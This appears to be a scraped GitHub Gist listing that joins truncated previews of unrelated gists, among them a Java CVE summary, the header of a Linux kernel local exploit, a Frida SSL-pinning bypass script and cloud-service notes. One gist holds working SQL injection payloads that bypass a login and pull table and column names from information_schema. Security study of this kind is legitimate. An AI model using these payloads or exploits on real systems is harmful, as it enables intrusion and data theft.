Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie
win3zz
/ CVE-2023-21939.md
Created
August 27, 2023 12:33
CVE-2023-21939 - Code Exec - Proof of Concept
brant-ruan
/ exploit.c
Created
September 13, 2022 16:19
https://www.grsecurity.net/~spender/exploits/cheddar_bay/exploit.c, modified by Bonan to run on Ubuntu 9.10 with recompiled 2.6.31 kernel
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun | |
| A vulnerability which, when viewed at the source level, is unexploitable! | |
| But which, thanks to gcc optimizations, becomes exploitable :) | |
| Also, bypass of mmap_min_addr via SELinux vulnerability! | |
| (where having SELinux enabled actually increases your risk against a | |
| large class of kernel vulnerabilities) | |
| for 2.6.30 without SELinux enabled, compile with: | |
| cc -fPIC -fno-stack-protector -shared -o exploit.so exploit.c | |
| (on a 64bit system -m64 may be necessary to compile a 64bit .so) |
alvinhochun
/ cfguard-for-mingw-w64.md
Last active
May 11, 2025 19:47
Control Flow Guard (CFG/CFGuard) for mingw-w64
Control Flow Guard is a security mitigation that verifies the target address of indirect calls. It works by having the compiler insert a check at indirect call sites to verify the validity of the call target, and also the linker write the necessary data and flags into the PE/COFF image to enable the feature on Windows' end.
danleyb2
/ Program.cs
Created
August 21, 2022 07:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using HttpMultipartParser; | |
| namespace WebhookReceiver | |
| { | |
| internal class HttpServer |
ANRCorleone
/ readme.txt
Last active
May 4, 2025 07:38
— forked from krisalyssa/readme.txt
Ubuntu 22.04 + Hyper V + Enhanced Session mode + XRDP PulseAudio
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Credits | |
| # https://c-nergy.be/blog/?p=13655 | |
| # https://askubuntu.com/questions/844245/how-to-compile-latest-pulseaudio-with-webrtc-in-ubuntu-16-04 | |
| # https://askubuntu.com/questions/496549/error-you-must-put-some-source-uris-in-your-sources-list | |
| # https://unix.stackexchange.com/questions/65167/enable-udev-and-speex-support-for-pulseaudio | |
| # https://rudd-o.com/linux-and-free-software/how-to-make-pulseaudio-run-once-at-boot-for-all-your-users | |
| # https://gist.github.com/rkttu/35ecab5604c9ddc356b0af4644d5a226 | |
| # Installation and Enhanced session | |
| # follow steps on the post below, I installed Ubuntu 22.04 on a Windows 11 machine |
fernandoherreradelasheras
/ smart-video-cutter.sh
Created
February 26, 2022 17:01
Smart video cutter with minimal transcoding using ffmpg
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/bash | |
| # | |
| # Cut a fragment of a video with the minimal possible re-encoding. | |
| # If the new start point is not a key frame it reencodes the video | |
| # from that point until the frame before a new keyframe. The remaining | |
| # part is copied as passthrough and both fragments are concatenated | |
| # | |
| # In order to make the video streams compatible we use the same codec | |
| # and bitrate. This works fine with h264. No idea about other codecs |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| username=' UNION SELECT "butters" as password FROM admins WHERE '1' = '1 | |
| password=butters | |
| username=foo' OR (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
| shows table name admin | |
| username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
| gives id row | |
| username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
| gives username row |
- IaaS指提供系统(可以自己选)或者储存空间之类的硬件,软件要自己手动装。PaaS提供语言环境和框架(可以自己选)。SaaS只能使用开发好的软件(卖软件本身,如税务会计、表格文字处理)。BaaS一般类似于非关系数据库,但各家不通用
- 云服务的特点:零前期成本 & 按需付费 & 弹性(类似于租,可随时多加、退掉;但没有残值)、高可用(放在机房中,不同AZ间水电隔离)
- https://education.github.com/pack GitHub学生包,需用教育邮箱验证。各种福利,可从DigitalOcean上手
- https://github.com/ripienaar/free-for-dev 本文尽量不与此项目重复
- https://free.zhelper.net/
akabe1
/ frida_multiple_unpinning.js
Last active
May 6, 2025 18:05
Another Android ssl certificate pinning bypass for various methods
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Android ssl certificate pinning bypass script for various methods | |
| by Maurizio Siddu | |
| Run with: | |
| frida -U -f <APP_ID> -l frida_multiple_unpinning.js [--no-pause] | |
| */ | |
| setTimeout(function() { | |
| Java.perform(function() { | |
| console.log(''); |
ulidtko
/ qnap-qts-fw-cryptor.py
Last active
March 21, 2025 05:39
QNAP QTS firmware encryptor/decryptor.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os, sys | |
| import argparse | |
| import struct | |
| from functools import reduce | |
| """ | |
| QNAP QTS firmware encryptor/decryptor. | |
| Based on https://pastebin.com/KHbX85nG |
NewerOlder